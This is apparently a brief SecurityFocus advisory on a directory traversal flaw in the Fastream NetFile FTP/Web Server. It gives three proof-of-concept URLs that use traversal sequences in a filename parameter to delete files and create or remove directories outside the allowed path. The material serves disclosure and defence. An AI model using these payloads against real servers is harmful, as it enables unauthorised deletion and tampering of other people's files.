Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability

No exploit is required.

The following proof of concepts are available:
http://www.example.com/?command=delete&filename=.../..//a/.../yyy.txt
http://www.example.com/?command=mkdir&filename=.../..//a/.../testdir
http://www.example.com/?command=rmdir&filename=.../..//a/.../testdir


 

Privacy Statement
Copyright 2010, SecurityFocus